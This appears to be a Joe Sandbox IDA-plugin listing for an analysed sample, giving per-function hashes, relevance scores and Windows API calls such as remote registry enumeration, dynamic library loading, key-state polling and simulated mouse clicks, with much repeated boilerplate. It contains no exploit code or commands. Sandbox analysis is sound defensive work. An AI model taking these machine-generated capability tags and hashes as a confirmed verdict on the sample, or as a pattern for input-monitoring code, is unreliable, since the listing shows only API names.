Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 63ade729e37cf4c8762543def7001afc0b8ae2b06628af4a721a98f39376d164
Instruction ID: b3f5098d15901e24e45edde73fbf2e818b89d0ded411d1fc0b013b2a4250c80a
Opcode Fuzzy Hash: 63ade729e37cf4c8762543def7001afc0b8ae2b06628af4a721a98f39376d164
Instruction Fuzzy Hash: 2A816E71604301AFD720EF28C986B6AB7E5EF48720F54886DF9999B2D2DB70EC41CB51

Function 00B202C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00B210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B20038,?,?), ref: 00B210BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B203C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B2040E
RegCloseKey.ADVAPI32(?,?), ref: 00B2043A
RegCloseKey.ADVAPI32(00000000), ref: 00B20447

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 58508c0199f9120d4b07e286acde421e75dd29c27b6c1a42f954357ccc2babef
Instruction ID: b9464a4a6f0b645fa81632bf9be173068744240c4f6934ed89066018ef3f2527
Opcode Fuzzy Hash: 58508c0199f9120d4b07e286acde421e75dd29c27b6c1a42f954357ccc2babef
Instruction Fuzzy Hash: B7514631218205AFD704EF64D981E6FB7F8FF88704F04896DB5999B2A2DB30E905CB52

Function 00B1DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B1DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00B1DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B1DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00B1DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B1DD35

Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07B20,?,?,00000000), ref: 00AA5B8C
Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07B20,?,?,00000000,?,?), ref: 00AA5BB0

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: dcfedd79ef7fd21e077ff146e7a1bb691e1da93e596362220d2bdaf8124a9ff6
Instruction ID: eb2cf6662ff5daa5f3ddcee401a04b5e58de5251ad5e9e0dd533fb4e5a239ea2
Opcode Fuzzy Hash: dcfedd79ef7fd21e077ff146e7a1bb691e1da93e596362220d2bdaf8124a9ff6
Instruction Fuzzy Hash: B9511875A00605EFCB00EFA8C584DEEB7F4FF59320B5484A9E815AB361DB31AD85CB91

Function 00B0E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B0E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B0E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B0E8F2

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B0E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B0E91F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 499a269e9eb5cc51cc855812facdaf0d584484c1a6906f8b15a9d3cf80c5fb59
Instruction ID: a50780e9d278ceec3f097760e10d47f9a2d1b569763a5bb438d835c1a1008605
Opcode Fuzzy Hash: 499a269e9eb5cc51cc855812facdaf0d584484c1a6906f8b15a9d3cf80c5fb59
Instruction Fuzzy Hash: 95510C35A00205EFCF15EF64C981AAEBBF5EF49310B1484A9F849AB3A1DB31ED51DB50

Function 00B2A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e571b09ed29d72136230909e1c9449ab9df4f937fd50327a40fbda44b84fb4
Instruction ID: e50d9533df2734d6b30776afb2e638950f73d931a429058324d7ac1761a1054b
Opcode Fuzzy Hash: 29e571b09ed29d72136230909e1c9449ab9df4f937fd50327a40fbda44b84fb4
Instruction Fuzzy Hash: 9D41D435900124AFD720DF28EC88FB9BBF9EB09310F1441A5F869A72E1DB74AD41DA95

Function 00AA2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00AA2357
ScreenToClient.USER32(00B667B0,?), ref: 00AA2374
GetAsyncKeyState.USER32(00000001), ref: 00AA2399
GetAsyncKeyState.USER32(00000002), ref: 00AA23A7

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f19d508924853f6dcbdd3e53e89d61d0b37c3241cb307055c44963bb4bf4f420
Instruction ID: 1e51b56bfb23e65af2021d5aa4f8f6306f97b2f5b053721d5abdaa062adffe09
Opcode Fuzzy Hash: f19d508924853f6dcbdd3e53e89d61d0b37c3241cb307055c44963bb4bf4f420
Instruction Fuzzy Hash: 7B416D3550411AFBDF159FA8C844AEABBB4FF06320F20436AF829972D0C7349964DBA1

Function 00AF6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00AF69A9
TranslateMessage.USER32(?), ref: 00AF69D2
DispatchMessageW.USER32(?), ref: 00AF69DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF69EB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 772ab1d393af7233ce66e795341f76a9e0e72727b54000f92cb287034da3f845
Instruction ID: 9dd5e5082935d6bdad705a0a3fefed4dfdedf738457ac3dc9d870b1c39a5df31
Opcode Fuzzy Hash: 772ab1d393af7233ce66e795341f76a9e0e72727b54000f92cb287034da3f845
Instruction Fuzzy Hash: F231C57150024AAADB31DFB48C84FB6BBBCEB11344F104569F621D31A1DBB5D88AD7A0

Function 00AF8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AF8F12
PostMessageW.USER32(?,00000201,00000001), ref: 00AF8FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AF8FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00AF8FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AF8FDA

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2f2ac0ea102b2e6a9672da72d018e02cf990b2285c0e48c29be03e915a57c5a4
Instruction ID: 0dbfe50c75809e6058f70bcb79edc38928c428e6b27b712b1adf9711c9c3367b
Opcode Fuzzy Hash: 2f2ac0ea102b2e6a9672da72d018e02cf990b2285c0e48c29be03e915a57c5a4
Instruction Fuzzy Hash: 9C31BC7150021EEFDF14CFA8DD4DAAE7BB6EB04315F104229FA25AB1D0CBB49914DB90

Function 00AFB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00AFB6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AFB6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AFB71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AFB742
_wcsstr.LIBCMT ref: 00AFB74C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: f5fed08cee74785c21d6165db84a0a331db1c6a1996edf66eb7e8913c55ceb09
Instruction ID: 27166256f69ccf9dc4512199609f8c18c4b97bd90e986119f79ee30d0768653b
Opcode Fuzzy Hash: f5fed08cee74785c21d6165db84a0a331db1c6a1996edf66eb7e8913c55ceb09
Instruction Fuzzy Hash: 65210732605208BBEB256B79DD49E7B7BB8DF49750F10403DFD05CA1A1EF61DC4192A0

Function 00B2B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetWindowLongW.USER32(?,000000F0), ref: 00B2B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B2B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B2B489
GetSystemMetrics.USER32(00000004), ref: 00B2B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B11184,00000000), ref: 00B2B4D0

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 46f00a8a8257ba9b5e4b07fa2316be13c7d0b790084aa2b518e5a848c6485708
Instruction ID: f2b0371eda7ea1646fb59d3479bffc7a111166f8fb6d0669062bd363ab38572a
Opcode Fuzzy Hash: 46f00a8a8257ba9b5e4b07fa2316be13c7d0b790084aa2b518e5a848c6485708
Instruction Fuzzy Hash: 15216271510666AFCB20AF38AC84E6A77E4EB05720F144775F939D72E1EF309811DB90

Function 00AF97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF9802

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF9834
__itow.LIBCMT ref: 00AF984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF9874
__itow.LIBCMT ref: 00AF9885

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 34fa3e077e335535fa4c1e35e803d0eefd5a15248488cb58485cea9b4edc0c4f
Instruction ID: 89dff2f9fee4ba208ce1fe90e44d012d2e611f4ae670ff4b728adc58b6d9aada
Opcode Fuzzy Hash: 34fa3e077e335535fa4c1e35e803d0eefd5a15248488cb58485cea9b4edc0c4f
Instruction Fuzzy Hash: 4B21B331A00208ABDB219BA58D8AFFF7BB8EF4A750F044039FA049B291DA708D4587D1

Function 00AA12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA134D
SelectObject.GDI32(?,00000000), ref: 00AA135C
BeginPath.GDI32(?), ref: 00AA1373
SelectObject.GDI32(?,00000000), ref: 00AA139C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c69cb45a9918abcccc9b72cc90e602c3cd51f85d9bb3b79d36cecb1e790f0ef1
Instruction ID: 4180d8fdced296c1cb8c02af4af9fe2da80277a3c671a5ff30f3563598b5c9b9
Opcode Fuzzy Hash: c69cb45a9918abcccc9b72cc90e602c3cd51f85d9bb3b79d36cecb1e790f0ef1
Instruction Fuzzy Hash: 68213D70800209EFDF119F25DC047AD7BB9FB11321F148227F8119B5E0DBB59992DBA0

Function 00AFC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00AFC176
_memcmp.LIBCMT ref: 00AFC194
_memcmp.LIBCMT ref: 00AFC1A7
_memcmp.LIBCMT ref: 00AFC1BF
_memcmp.LIBCMT ref: 00AFC1D7

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d80cc450f128e5e1db65423577497cebdbf47a767db2d34ad0cb27ad09a61b0c
Instruction ID: f0e0eb7811ee0765115867276190d8d06f2017e2ecd00951fa9f20930480298f
Opcode Fuzzy Hash: d80cc450f128e5e1db65423577497cebdbf47a767db2d34ad0cb27ad09a61b0c
Instruction Fuzzy Hash: 6801B97170410D7BD204A7665E52F7BB39C9B113B4F544125FE0497293E660EF3182E4

Function 00B04D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B04D5C
__beginthreadex.LIBCMT ref: 00B04D7A
MessageBoxW.USER32(?,?,?,?), ref: 00B04D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B04DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B04DAC

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 25836a83204751e0e41ef8ab706198d447a0fcc0a0b8f1f60b1318fb150db734
Instruction ID: 9aeeef9c70b230c729ce37f37c9ce2bd40c23abcee1306ed18d2ad00c94c2055
Opcode Fuzzy Hash: 25836a83204751e0e41ef8ab706198d447a0fcc0a0b8f1f60b1318fb150db734
Instruction Fuzzy Hash: 381108B2904205BBC7119BA8DC04AAB7FECEB45324F1443B9F914D32D1DBB58D008BA0

Function 00AF874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8766
GetLastError.KERNEL32(?,00AF822A,?,?,?), ref: 00AF8770
GetProcessHeap.KERNEL32(00000008,?,?,00AF822A,?,?,?), ref: 00AF877F
HeapAlloc.KERNEL32(00000000,?,00AF822A,?,?,?), ref: 00AF8786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF879D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1fa8c1168035fbfff58a136fce884b91b7b4ca24e0cab08b130153d13bafc758
Instruction ID: 2e45fb2ec01215e10b717801b1952a34b64c249dd417944aaadd2b26154d7f35
Opcode Fuzzy Hash: 1fa8c1168035fbfff58a136fce884b91b7b4ca24e0cab08b130153d13bafc758
Instruction Fuzzy Hash: 46014B71600209EFDB205FA6DC89D7B7BBCEF897957200439F949D3260DE358C12CA60

Function 00B054E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05502
